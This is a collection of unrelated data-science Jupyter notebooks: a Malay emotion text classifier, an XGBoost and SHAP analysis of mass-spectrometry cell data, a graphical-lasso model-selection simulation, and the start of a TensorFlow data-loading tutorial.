mula = mula[1][1] if len(mula[1][1]) > len(mula[0][1]) else mula[0][1]
return word.replace(mula, '')
def classification_textcleaning(string):
string = re.sub(
r'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub(r'[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
string = ' '.join(
[i for i in re.findall(r'[\w\']+|[;:\-\(\)&.,!?"]', string) if len(i)]
)
string = string.lower().split()
string = [(naive_stemmer(word), word) for word in string]
return (
' '.join([word[0] for word in string if len(word[0]) > 1]),
' '.join([word[1] for word in string if len(word[0]) > 1]),
)
import os
emotion_files = [f for f in os.listdir(os.getcwd()) if 'translated-' in f]
emotion_files
texts, labels = [], []
for f in emotion_files:
with open(f) as fopen:
dataset = list(filter(None, fopen.read().split('\n')))
labels.extend([f.split('-')[1]] * len(dataset))
texts.extend(dataset)
for i in range(len(texts)):
texts[i] = classification_textcleaning(texts[i])[0]
unique_labels = np.unique(labels).tolist()
labels = LabelEncoder().fit_transform(labels)
unique_labels
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
tfidf = TfidfVectorizer(ngram_range=(1, 3),min_df=2).fit(texts)
delattr(tfidf, 'stop_words_')
vectors = tfidf.transform(texts)
vectors.shape
train_X, test_X, train_Y, test_Y = train_test_split(vectors, labels, test_size = 0.2)
multinomial = MultinomialNB().fit(train_X, train_Y)
print(
metrics.classification_report(
train_Y,
multinomial.predict(train_X),
target_names = unique_labels,
)
)
multinomial = MultinomialNB().fit(train_X, train_Y)
print(
metrics.classification_report(
test_Y,
multinomial.predict(test_X),
target_names = unique_labels,
)
)
text = 'kerajaan sebenarnya sangat bencikan rakyatnya, minyak naik dan segalanya'
multinomial.predict_proba(tfidf.transform([classification_textcleaning(text)[0]]))
import pickle
with open('multinomial-emotion.pkl','wb') as fopen:
pickle.dump(multinomial,fopen)
with open('tfidf-multinomial-emotion.pkl','wb') as fopen:
pickle.dump(tfidf,fopen)
```
| github_jupyter |
```
import analysis
import test_features
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.pyplot import subplots,scatter
import matplotlib.patches as mpatches
import seaborn as sns
import joblib  # sklearn.externals.joblib was removed in modern scikit-learn
from sklearn.cluster import KMeans
from sklearn.metrics import adjusted_rand_score, adjusted_mutual_info_score
import scipy.stats as stats
from sklearn.cluster import AgglomerativeClustering
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.model_selection import cross_val_score
#from yellowbrick.features import RFECV
from sklearn.feature_selection import RFECV
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
import xgboost
data_info = pd.read_csv('data_info.csv',index_col=0).T
batch = pd.read_csv('ICC_batch.csv',header=None)
data_info['type'] = data_info['type'].map({'0':'Astrocytes','1':'Neurons'})
data_info['batch'] = batch.values
data_info['batch'] = data_info['batch'].map({0:'batch 1',1:'batch 2'})
data_tic_pp = pd.read_csv('../../sweedler_lab/Data/intensity_tic_pp2.csv',index_col=0)
data_tic_pp_imp = pd.read_csv('../../sweedler_lab/Data/intensity_tic_imp_pp.csv',index_col=0)
data_tic_pp = data_tic_pp.fillna(0)
features = np.asarray([format(float(x),'.2f') for x in data_tic_pp.columns.values]).astype(float)
data_tic_pp.columns = features
data_tic_pp.shape
norm_factors = np.sqrt(np.mean(data_tic_pp.replace(0,np.NaN)**2,axis=1)).values
norm_factors = norm_factors.reshape(data_tic_pp.shape[0],1)
data_tic_pp = np.divide(data_tic_pp,norm_factors)
# norm_factors = np.linalg.norm(data_tic_pp,ord=2,axis=1)
# data_tic_pp = data_tic_pp/norm_factors.reshape(data_tic_pp.shape[0],1)
types = []
batches = []
for sampleid in data_tic_pp.index.values:
types.append(data_info[data_info['sampleID']==sampleid]['type'].values[0])
batches.append(data_info[data_info['sampleID']==sampleid]['batch'].values[0])
#types = np.asarray(types)
types = np.asarray(types)
batches = np.asarray(batches)
data_tic_pp['type'] = types
data_tic_pp.to_pickle('ICC.pkl')
data_rms_pp = pd.read_pickle('ICC_rms.pkl')
data_l2_pp = pd.read_pickle('ICC_L2.pkl')
data_tic_pp = pd.read_pickle('ICC.pkl')
pca_result = analysis.PCanalysis(5,4,data_tic_pp.drop('type',1),False)
pca_df = pd.DataFrame(pca_result)
pca_df['type'] = types
pca_df['batch'] = batches
fig,axes = subplots(1,1,figsize=(5,4))
g=sns.scatterplot(x=0,y=1,hue='type',style='batch',data=pca_df,ax=axes,s=20)
g.legend(loc='upper right')
g.get_xaxis().set_ticks([])
g.get_yaxis().set_ticks([])
plt.xlabel('PC1')
plt.ylabel('PC2')
fig.savefig('plot/pca_ICC.svg')
O,F,P=analysis.rank_sum_test(data_rms_pp.drop('type',1)[types=='Neurons'].values,
data_rms_pp.drop('type',1)[types=='Astrocytes'].values,features,1000)
plt.hist(P,bins=30)
rf_model = RandomForestClassifier(n_estimators=500)
X_train_tic, X_test_tic, y_train, y_test = train_test_split(data_tic_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_rms, X_test_rms, y_train, y_test = train_test_split(data_rms_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_l2, X_test_l2, y_train, y_test = train_test_split(data_l2_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_batch, X_test_batch, y_train_batch, y_test_batch = train_test_split(data_tic_pp.values, batches, test_size=0.2,random_state=19)
xgb_tic = joblib.load('xgb_best.sav')
xgb_rms = joblib.load('xgb_best.sav')
xgb_l2 = joblib.load('xgb_best.sav')
xgb_tic.fit(X_train_tic,y_train)
xgb_rms.fit(X_train_rms,y_train)
xgb_l2.fit(X_train_l2,y_train)
y_pred_xgb_tic = xgb_tic.predict(X_test_tic)
y_pred_xgb_rms = xgb_rms.predict(X_test_rms)
y_pred_xgb_l2 = xgb_l2.predict(X_test_l2)
y_pred_xgb_prob_tic = xgb_tic.predict_proba(X_test_tic)
y_pred_xgb_prob_rms = xgb_rms.predict_proba(X_test_rms)
y_pred_xgb_prob_l2 = xgb_l2.predict_proba(X_test_l2)
report_dict_xgb_tic = classification_report(y_test, y_pred_xgb_tic, output_dict=True)  # original referenced undefined y_pred_xgb_best
report_dict_xgb_tic
def plot_featureImp_glob(model, features, feature_num_shown):
    feature_imp = model.feature_importances_
    # Rank features by importance before normalizing (these lines were
    # commented out in the original, leaving the names below undefined).
    feature_imp_index_ranked = np.argsort(feature_imp)[::-1]
    features_ranked = features[feature_imp_index_ranked]
    feature_imp = feature_imp / feature_imp.max()
    fig, ax = subplots(figsize=(6, 4))
    ax.stem(features, feature_imp, markerfmt=' ')
    features_selected = []
    for i in range(feature_num_shown):
        ax.scatter(float(features_ranked[i]), feature_imp[feature_imp_index_ranked][i], color='k', s=10)
        ax.annotate(format(float(features_ranked[i]), '.4f'),
                    xy=(float(features_ranked[i]), feature_imp[feature_imp_index_ranked][i]), fontsize=8)
        features_selected.append(float(features_ranked[i]))
    ax.set_ylabel('relative importance')
    ax.set_xlabel('m/z')
    return fig, features_selected
# _,features_selected = plot_featureImp_glob(rf_model,features,40)
# _,features_selected2 = plot_featureImp_glob(xgb_model,features,40)
_, features_selected3 = plot_featureImp_glob(xgb_tic, features, 0)  # `xgb_best` was undefined; use the fitted TIC model
fig,axes = subplots(1,2,figsize=(18,4))
ax = axes.ravel()
ax[0].hist(y_pred_xgb_prob_tic[y_test=='Astrocytes'][:,0], bins=20)
ax[0].set_title('astrocytes', fontsize=15)
ax[1].hist(y_pred_xgb_prob_tic[y_test=='Neurons'][:,1], bins=20)
ax[1].set_title('neurons',fontsize=15)
ax[0].set_ylabel('number of cells',fontsize=15)
ax[1].set_ylabel('number of cells',fontsize=15)
ax[0].set_xlabel('predicted probability',fontsize=15)
ax[1].set_xlabel('predicted probability',fontsize=15)
ax[0].axvline(0.5,linestyle='-.',c='r',label='binary classification threshold')
ax[1].axvline(0.5,linestyle='-.',c='r',label='binary classification threshold')
ax[0].legend(fontsize=11,)
ax[1].legend(fontsize=11)
import shap
from adjustText import adjust_text
def feature_contrib(model,X,features,feature_num_shown,if_summary):
shap_explainer = shap.TreeExplainer(model)
shap_vals = shap_explainer.shap_values(X)
fig1,axes = subplots(figsize=(12,4))
g=axes.stem([float(x) for x in features],shap_vals.mean(axis=0),markerfmt=' ',linefmt='k')
axes.get_yaxis().set_ticks([])
shap_vals_index_ranked = np.argsort(shap_vals.mean(axis=0))[::-1]
shap_vals_ranked = shap_vals.mean(axis=0)[shap_vals_index_ranked]
#axes.spines['right'].set_visible(False)
#axes.spines['top'].set_visible(False)
texts = []
axes.scatter(features[shap_vals_index_ranked[:feature_num_shown]],shap_vals_ranked[:feature_num_shown],color='b',s=35,marker='v',label='Neurons')
axes.scatter(features[shap_vals_index_ranked[-feature_num_shown:]],shap_vals_ranked[-feature_num_shown:],color='orange',s=35,marker='s',label='Astrocytes')
#for i in range(feature_num_shown):
#texts.append(plt.text(float(features[shap_vals_index_ranked[i]]),shap_vals_ranked[i],float(features[shap_vals_index_ranked[i]]),fontsize=12))
#texts.append(plt.text(float(features[shap_vals_index_ranked[-i-1]]),shap_vals_ranked[-i-1],float(features[shap_vals_index_ranked[-i-1]]),fontsize=12))
# axes.annotate(format(float(features[shap_vals_index_ranked[i]]),'.2f'), xy=(float(features[shap_vals_index_ranked[i]]),shap_vals_ranked[i]),fontsize=10)
# axes.annotate(format(float(features[shap_vals_index_ranked[-i-1]]),'.2f'), xy=(float(features[shap_vals_index_ranked[-i-1]]),shap_vals_ranked[-i]),fontsize=10)
axes.set_xlabel('m/z',fontsize=12)
axes.set_ylabel('mean SHAP values',fontsize=12)
axes.legend()
#adjust_text(texts)
fig2 = None  # defined even when no summary plot is requested
if if_summary:
    fig2, axes = subplots(figsize=(12, 4))
    shap.summary_plot(shap_vals, X, max_display=15)
return fig1, fig2, shap_vals
fig1,fig2,contrib_xgb_tic = feature_contrib(xgb_tic,data_tic_pp.drop('type',1),data_tic_pp.drop('type',1).columns,10,True)
fig1,fig2,contrib_xgb_rms = feature_contrib(xgb_rms,data_rms_pp.drop('type',1),features,10,True)
fig1,fig2,contrib_xgb_l2 = feature_contrib(xgb_l2,data_l2_pp.drop('type',1),features,10,True)
fig,axes = subplots(2,3,figsize=(15,8))
plt.subplots_adjust(left = 0.125,right = 0.9,bottom = 0.1 ,top = 0.9,wspace = 0.4,hspace = 0.4)
ax = axes.ravel()
ax[0].scatter(contrib_xgb_tic.mean(0),contrib_xgb_rms.mean(0))
ax[0].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(contrib_xgb_tic.mean(0), contrib_xgb_rms.mean(0))[0], 3)))
ax[0].set_xlabel('mean SHAP, TIC normalization')
ax[0].set_ylabel('mean SHAP, RMS normalization')
ax[1].scatter(contrib_xgb_l2.mean(0),contrib_xgb_rms.mean(0))
ax[1].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(contrib_xgb_l2.mean(0), contrib_xgb_rms.mean(0))[0], 3)))
ax[1].set_xlabel('mean SHAP, L2 normalization')
ax[1].set_ylabel('mean SHAP, RMS normalization')
ax[2].scatter(contrib_xgb_tic.mean(0),contrib_xgb_l2.mean(0))
ax[2].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(contrib_xgb_tic.mean(0), contrib_xgb_l2.mean(0))[0], 3)))
ax[2].set_xlabel('mean SHAP, TIC normalization')
ax[2].set_ylabel('mean SHAP, L2 normalization')
ax[3].scatter(xgb_tic.feature_importances_,xgb_rms.feature_importances_)
ax[3].set_xlim(left=0)
ax[3].set_ylim(bottom=0)
ax[3].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(xgb_tic.feature_importances_, xgb_rms.feature_importances_)[0], 3)))
ax[3].set_xlabel('Gini importance, TIC normalization')
ax[3].set_ylabel('Gini importance, RMS normalization')
ax[4].scatter(xgb_l2.feature_importances_,xgb_rms.feature_importances_)
ax[4].set_xlim(left=0)
ax[4].set_ylim(bottom=0)
ax[4].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(xgb_l2.feature_importances_, xgb_rms.feature_importances_)[0], 3)))
ax[4].set_xlabel('Gini importance, L2 normalization')
ax[4].set_ylabel('Gini importance, RMS normalization')
ax[5].scatter(xgb_tic.feature_importances_,xgb_l2.feature_importances_)
ax[5].set_xlim(left=0)
ax[5].set_ylim(bottom=0)
ax[5].set_title('Spearman correlation = {}'.format(round(stats.spearmanr(xgb_tic.feature_importances_, xgb_l2.feature_importances_)[0], 3)))
ax[5].set_xlabel('Gini importance, TIC normalization')
ax[5].set_ylabel('Gini importance, L2 normalization')
fig1.savefig('plot/contribution_plot_ICC_2.svg')
#fig2.savefig('plot/shap_plot_ICC.svg')
shap_ranked_index = np.argsort(abs(contrib_xgb_rms.mean(0)))[::-1]
gini_ranked_index = np.argsort(abs(xgb_rms.feature_importances_))[::-1]
rst_ranked_index = np.argsort(-P)[::-1]
shared_shap_gini = set(shap_ranked_index[:60]).intersection(set(gini_ranked_index[:60]))
shared_shap_rst = set(shap_ranked_index[:60]).intersection(set(rst_ranked_index[:60]))
shared_gini_rst = set(gini_ranked_index[:60]).intersection(set(rst_ranked_index[:60]))
shared_all = set(gini_ranked_index[:60]).intersection(set(rst_ranked_index[:60])).intersection(set(shap_ranked_index[:60]))
print(len(shared_shap_gini),len(shared_shap_rst),len(shared_gini_rst),len(shared_all))
common_feature = features[list(shared_all)]
common_feature = common_feature[np.argsort(common_feature)]
common_feature
import matplotlib
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.ticker import MaxNLocator
def shap_clustering(shap_vals,groups):
shap_pca50 = PCA(n_components=12).fit_transform(shap_vals)
#shap_embedded = TSNE(n_components=2, perplexity=25).fit_transform(shap_vals)
cdict1 = {
'red': ((0.0, 0.11764705882352941, 0.11764705882352941),
(1.0, 0.9607843137254902, 0.9607843137254902)),
'green': ((0.0, 0.5333333333333333, 0.5333333333333333),
(1.0, 0.15294117647058825, 0.15294117647058825)),
'blue': ((0.0, 0.8980392156862745, 0.8980392156862745),
(1.0, 0.3411764705882353, 0.3411764705882353)),
'alpha': ((0.0, 1, 1),
(0.5, 1, 1),
(1.0, 1, 1))
} # #1E88E5 -> #ff0052
red_blue_solid = LinearSegmentedColormap('RedBlue', cdict1)
shap_embedded_df = pd.DataFrame(shap_pca50)
shap_embedded_df['type'] = groups
f1,axes= subplots(1,1,figsize=(5,4))
g = sns.scatterplot(x=0,y=1,hue='type',data=shap_embedded_df,ax=axes)
g.legend(loc='upper right')
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
axes.get_yaxis().set_ticks([])
axes.get_xaxis().set_ticks([])
axes.set_xlabel('PC1',fontsize=12)
axes.set_ylabel('PC2',fontsize=12)
f2,axes= subplots(1,1,figsize=(6,4))
plt.scatter(shap_pca50[:,0],
shap_pca50[:,1],
c=shap_vals.sum(1).astype(np.float64),
linewidth=0, alpha=0.9, cmap=red_blue_solid)
cb = plt.colorbar(label="Log odds of being astrocytes or neurons", aspect=40, orientation="vertical")
cb.set_alpha(1)
cb.draw_all()
cb.outline.set_linewidth(0)
cb.ax.tick_params('x', length=0)
cb.ax.xaxis.set_ticks_position("top")
cb.ax.xaxis.set_label_position('bottom')
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
axes.get_yaxis().set_ticks([])
axes.get_xaxis().set_ticks([])
axes.set_xlabel('PC1',fontsize=12)
axes.set_ylabel('PC2',fontsize=12)
plt.show()
return f1,f2,shap_pca50
f1,f2,shap_pca_df = shap_clustering(contrib_xgb_rms,types)
f1.savefig('plot/pca_SHAP_ICC.svg')
f2.savefig('plot/pca_SHAP_prob_ICC.svg')
def plot_shap_features(shap_vals,X,FOI):
shap_pca = PCA(n_components=12).fit_transform(shap_vals)
cdict1 = {
'red': ((0.0, 0.11764705882352941, 0.11764705882352941),
(1.0, 0.9607843137254902, 0.9607843137254902)),
'green': ((0.0, 0.5333333333333333, 0.5333333333333333),
(1.0, 0.15294117647058825, 0.15294117647058825)),
'blue': ((0.0, 0.8980392156862745, 0.8980392156862745),
(1.0, 0.3411764705882353, 0.3411764705882353)),
'alpha': ((0.0, 1, 1),
(0.5, 1, 1),
(1.0, 1, 1))
} # #1E88E5 -> #ff0052
red_blue_solid = LinearSegmentedColormap('RedBlue', cdict1)
row_plot = int(np.ceil(len(FOI)/3))
f,axes = subplots(3,row_plot,figsize=(row_plot*5,10))
ax = axes.ravel()
index = 0
for feature in FOI:
fig=ax[index].scatter(shap_pca[:,0],
shap_pca[:,1],
c=X[feature].values[:10000].astype(np.float64),
linewidth=0, alpha=0.75, cmap=red_blue_solid)
cb=plt.colorbar(fig, aspect=40, orientation="vertical",ax=ax[index])
cb.set_alpha(1)
cb.set_label(label='normalized intensity',size=12)
cb.draw_all()
cb.outline.set_linewidth(0)
cb.ax.tick_params('x', length=0)
cb.ax.xaxis.set_label_position('top')
ax[index].set_title(format(float(feature),'.2f')+' m/z',fontsize=15)
ax[index].axis("off")
index += 1
return f
f=plot_shap_features(contrib_xgb_best,data_tic_pp,[650.51,676.49,768.59])
f.savefig('plot/SHAP_features_ICC.svg')
from datetime import datetime
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import StratifiedKFold
import warnings
warnings.filterwarnings('ignore')
def timer(start_time=None):
if not start_time:
start_time = datetime.now()
return start_time
elif start_time:
thour, temp_sec = divmod((datetime.now() - start_time).total_seconds(), 3600)
tmin, tsec = divmod(temp_sec, 60)
print('\n Time taken: %i hours %i minutes and %s seconds.' % (thour, tmin, round(tsec, 2)))
# A parameter grid for XGBoost
params = {
'min_child_weight': [1, 5, 10],
'gamma': [0,0.5, 1, 1.5, 2, 5],
'subsample': [0.6, 0.8, 1.0],
'colsample_bytree': [0.6, 0.8, 1.0],
'max_depth': [3, 4, 5, 7,10],
'learning_rate':[0.1,0.05,0.01,0.005],
'reg_alpha':[0,1e-5, 1e-2, 0.1, 1]
}
xgb = xgboost.XGBClassifier(learning_rate=0.02, n_estimators=600, objective='binary:logistic',
silent=True, nthread=1)
folds = 5
param_comb = 5
skf = StratifiedKFold(n_splits=folds, shuffle = True, random_state = 19)
random_search = RandomizedSearchCV(xgb, param_distributions=params, n_iter=param_comb, scoring='roc_auc',
n_jobs=8, cv=skf.split(X_train,y_train), verbose=3, random_state=19 )
# Here we go
start_time = timer(None) # timing starts from this point for "start_time" variable
random_search.fit(X_train, y_train)
timer(start_time) # timing ends here for "start_time" variable
print('\n All results:')
print(random_search.cv_results_)
print('\n Best estimator:')
print(random_search.best_estimator_)
print('\n Best normalized gini score for %d-fold search with %d parameter combinations:' % (folds, param_comb))
print(random_search.best_score_ * 2 - 1)
print('\n Best hyperparameters:')
print(random_search.best_params_)
xgb_best = xgboost.XGBClassifier(learning_rate=0.1, n_estimators=600, objective='binary:logistic',
subsample=1,reg_alpha=0,min_child_weight=5,max_depth=4,gamma=0,colsample_bytree=1)
xgb_best.fit(X_train,y_train)
y_pred_xgb_best = xgb_best.predict(X_test)
y_pred_xgb_prob_best = xgb_best.predict_proba(X_test)
report_dict_xgb_best = classification_report(y_test, y_pred_xgb_best, output_dict=True)
joblib.dump(xgb_best,'xgb_best_2.sav')
```
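The score printed after the randomized search converts ROC AUC into a normalized Gini coefficient via `2*AUC - 1`. A quick self-contained sanity check of that relation (the rank-based AUC helper and the toy labels/scores below are illustrative, not part of the search output):

```python
def roc_auc(y_true, y_score):
    # Rank-based ROC AUC: the probability that a randomly chosen positive
    # is scored above a randomly chosen negative (ties count as half a win).
    pos = [s for s, y in zip(y_score, y_true) if y == 1]
    neg = [s for s, y in zip(y_score, y_true) if y == 0]
    wins = sum((p > n) + 0.5 * (p == n) for p in pos for n in neg)
    return wins / float(len(pos) * len(neg))

y_true = [0, 0, 1, 1]
y_score = [0.1, 0.4, 0.35, 0.8]
auc = roc_auc(y_true, y_score)   # 0.75 on this toy example
gini = 2 * auc - 1               # the conversion used above -> 0.5
```

A perfectly random ranker has AUC 0.5 and therefore Gini 0, which is why the Gini form is convenient for reporting.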
```
import matplotlib
%matplotlib nbagg
from matplotlib import pyplot
from statiskit import (linalg,
core,
pgm)
import math
import os
%reload_ext rpy2.ipython
%%R
library(glasso)
if 'K' not in os.environ:
os.environ['K'] = str(10)
K = int(os.environ.get('K'))
simulation = !jupyter nbconvert --ExecutePreprocessor.timeout=3600 --to notebook --execute sampling.ipynb --output sampling.ipynb
data = core.read_csv('data.csv')
if 'LASSO_PATH' not in os.environ:
os.environ['LASSO_PATH'] = "linear"
LASSO_PATH = os.environ.get('LASSO_PATH')
if 'PENALTIES' not in os.environ:
os.environ['PENALTIES'] = str(K)
PENALTIES = int(os.environ.get('PENALTIES'))
import itertools
import numpy
import math
S = data.covariance
for u in range(K):
S[u, u] = float("nan")
for v in range(u):
S[u, v] = math.fabs(S[u, v])
S[v, u] = S[u, v]
rhos = core.from_list(list(itertools.chain(*S.to_list())))
if LASSO_PATH == 'linear':
rhos = numpy.linspace(rhos.min.value, rhos.max.value, PENALTIES).tolist()
elif LASSO_PATH == 'empirical':
freq = core.frequency_estimation(data=rhos)
rhos = [freq.estimated.quantile(rho) for rho in numpy.linspace(0., 1., PENALTIES)]
else:
raise ValueError("invalid 'LASSO_PATH' environment variable value: {}".format(LASSO_PATH))
%R data = read.csv('data.csv', header = F, sep="")
%R -n S = cov(data)
graphs = []
for rho in rhos:
%R -i rho
theta = %R glasso(S, rho=rho)$wi
graphs.append(pgm.UndirectedGraph(linalg.Matrix(theta)))
graphs = sorted(graphs, key = lambda graph: graph.nb_edges)
graphs = [graphs[0]] + [graphs[index] for index in range(1, len(graphs)) if not graphs[index - 1].nb_edges == graphs[index].nb_edges]
logLs = []
for graph in graphs:
passed = False
for algo in ['NR', 'sGA', 'GA']:
try:
mle = pgm.graphical_gaussian_estimation(algo=algo,
data=data,
graph=graph)
logLs.append(2 * mle.estimated.loglikelihood(data))
except Exception:
pass
else:
passed = True
break
if not passed:
logLs.append(float("nan"))
graphs, logLs = zip(*[(graph, logL) for graph, logL in zip(graphs, logLs) if not math.isnan(logL)])
dimensions = [graph.nb_edges for graph in graphs]
total = data.total
BICs = [logL - 2 * dimension * math.log(total) for logL, dimension in zip(logLs, dimensions)]
BIC = BICs.index(max(BICs))
AICs = [logL - 2 * dimension for logL, dimension in zip(logLs, dimensions)]
AIC = AICs.index(max(AICs))
SHs = core.SlopeHeuristic(dimensions, logLs)
SH = SHs.selector(SHs)
fig = pyplot.figure()
axes0, axes1 = SHs.plot()
axes0.plot(BICs)
axes0.plot(AICs)
pyplot.tight_layout()
fig = pyplot.figure()
truth = pgm.read_gml('graph.gml')
axes = truth.to_matrix().plot(axes = fig.add_subplot(141))
axes.set_title('$G$')
index = 2
for criterion, graph in zip(['BIC', 'AIC', 'SH'], [BIC, AIC, SH]):
axes = graphs[graph].to_matrix().plot(axes = fig.add_subplot(1, 4, index))
axes.set_title(r'$\widehat{G}_{' + criterion + '}$')
index += 1
pyplot.tight_layout()
def TP(truth, predicted):
tp = 0
for u in range(truth.nb_vertices):
for v in range(u):
if truth.has_edge(u, v) and predicted.has_edge(u, v):
tp += 1
return tp
def TN(truth, predicted):
tn = 0
for u in range(truth.nb_vertices):
for v in range(u):
if not truth.has_edge(u, v) and not predicted.has_edge(u, v):
tn += 1
return tn
def FP(truth, predicted):
fp = 0
for u in range(truth.nb_vertices):
for v in range(u):
if not truth.has_edge(u, v) and predicted.has_edge(u, v):
fp += 1
return fp
def FN(truth, predicted):
fn = 0
for u in range(truth.nb_vertices):
for v in range(u):
if truth.has_edge(u, v) and not predicted.has_edge(u, v):
fn += 1
return fn
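# The four counts above can be folded into the usual summary scores.
# Illustrative helper (not part of the original pipeline); zero
# denominators are mapped to 0.0 so that empty graphs stay well-defined.
def precision_recall_f1(tp, tn, fp, fn):
    precision = float(tp) / (tp + fp) if (tp + fp) else 0.0
    recall = float(tp) / (tp + fn) if (tp + fn) else 0.0
    f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0
    return precision, recall, f1
# Example: 8 true edges recovered, 2 spurious, 4 missed
p, r, f = precision_recall_f1(tp=8, tn=30, fp=2, fn=4)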
import hashlib
from datetime import datetime
identifier = hashlib.md5(str(datetime.today()).encode("utf-8")).hexdigest()
if not os.path.exists('paths.csv'):
with open('paths.csv', 'w') as filehandler:
filehandler.write('identifier,dimension,path,TP,TN,FP,FN\n')
with open('paths.csv', 'a') as filehandler:
for graph in graphs:
tp, tn, fp, fn = TP(truth, graph), TN(truth, graph), FP(truth, graph), FN(truth, graph)
filehandler.write(','.join([identifier, str(K), str(LASSO_PATH), str(tp), str(tn), str(fp), str(fn)]) + '\n')
if not os.path.exists('criteria.csv'):
with open('criteria.csv', 'w') as filehandler:
filehandler.write('identifier,dimension,criterion,TP,TN,FP,FN\n')
with open('criteria.csv', 'a') as filehandler:
for criterion, graph in zip(['BIC', 'AIC', 'SH'], [BIC, AIC, SH]):
tp, tn, fp, fn = TP(truth, graphs[graph]), TN(truth, graphs[graph]), FP(truth, graphs[graph]), FN(truth, graphs[graph])
filehandler.write(','.join([identifier, str(K), str(criterion), str(tp), str(tn), str(fp), str(fn)]) + '\n')
os.remove('graph.gml')
os.remove('data.csv')
```
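The model-selection step in the notebook above keeps, for each criterion, the graph maximizing a penalized log-likelihood. A minimal standalone sketch of that selection with made-up `(logL, dimension)` values (the numbers are hypothetical; the penalties mirror the `logL - 2*dimension*log(total)` and `logL - 2*dimension` forms used above):

```python
import math

# Hypothetical (2*log-likelihood, edge count) pairs for three fitted graphs
logLs = [-120.0, -100.0, -95.0]
dims = [3, 6, 12]
n = 200  # sample size

BICs = [ll - 2 * d * math.log(n) for ll, d in zip(logLs, dims)]
AICs = [ll - 2 * d for ll, d in zip(logLs, dims)]
best_bic = BICs.index(max(BICs))  # BIC penalizes extra edges most heavily
best_aic = AICs.index(max(AICs))
```

With these toy numbers BIC keeps the sparsest graph while AIC tolerates a few more edges, which is the typical qualitative difference between the two criteria.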
**Chapter 13 – Loading and Preprocessing Data with TensorFlow**
_This notebook contains all the sample code and solutions to the exercises in chapter 13._
<table align="left">
<td>
<a href="https://colab.research.google.com/github/ageron/handson-ml2/blob/master/13_loading_and_preprocessing_data.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
</td>
<td>
<a target="_blank" href="https://kaggle.com/kernels/welcome?src=https://github.com/ageron/handson-ml2/blob/add-kaggle-badge/13_loading_and_preprocessing_data.ipynb"><img src="https://kaggle.com/static/images/open-in-kaggle.svg" /></a>
</td>
</table>
# Setup
First, let's import a few common modules, make sure Matplotlib plots its figures inline, and prepare a function to save the figures. We also check that Python 3.5 or later is installed (even though Python 2.x may still work, it is deprecated, so we strongly recommend using Python 3), as well as Scikit-Learn ≥ 0.20.
```
# Python ≥3.5 is required
import sys
assert sys.version_info >= (3, 5)
# Is this notebook running on Colab or Kaggle?
IS_COLAB = "google.colab" in sys.modules
IS_KAGGLE = "kaggle_secrets" in sys.modules
if IS_COLAB or IS_KAGGLE:
!pip install -q -U tfx==0.21.2
print("You can safely ignore the package incompatibility errors.")
# Scikit-Learn ≥0.20 is required
import sklearn
assert sklearn.__version__ >= "0.20"
# TensorFlow ≥2.0 is required
import tensorflow as tf
from tensorflow import keras
assert tf.__version__ >= "2.0"
# Common imports
import numpy as np
import os
# to make this notebook's output stable across runs
np.random.seed(42)
# To plot pretty figures
%matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "data"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
os.makedirs(IMAGES_PATH, exist_ok=True)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
print("Saving figure", fig_id)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
```
## Datasets
```
X = tf.range(10)
dataset = tf.data.Dataset.from_tensor_slices(X)
dataset
```
Equivalently:
```
dataset = tf.data.Dataset.range(10)
for item in dataset:
print(item)
dataset = dataset.repeat(3).batch(7)
for item in dataset:
print(item)
dataset = dataset.map(lambda x: x * 2)
for item in dataset:
print(item)
#dataset = dataset.apply(tf.data.experimental.unbatch()) # Now deprecated
dataset = dataset.unbatch()
dataset = dataset.filter(lambda x: x < 10) # keep only items < 10
for item in dataset.take(3):
print(item)
tf.random.set_seed(42)
dataset = tf.data.Dataset.range(10).repeat(3)
dataset = dataset.shuffle(buffer_size=3, seed=42).batch(7)
for item in dataset:
print(item)
```
## Split the California dataset to multiple CSV files
Let's start by loading and preparing the California housing dataset. We first load it, then split it into a training set, a validation set and a test set, and finally we scale it:
```
from sklearn.datasets import fetch_california_housing
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
housing = fetch_california_housing()
X_train_full, X_test, y_train_full, y_test = train_test_split(
housing.data, housing.target.reshape(-1, 1), random_state=42)
X_train, X_valid, y_train, y_valid = train_test_split(
X_train_full, y_train_full, random_state=42)
scaler = StandardScaler()
scaler.fit(X_train)
X_mean = scaler.mean_
X_std = scaler.scale_
```
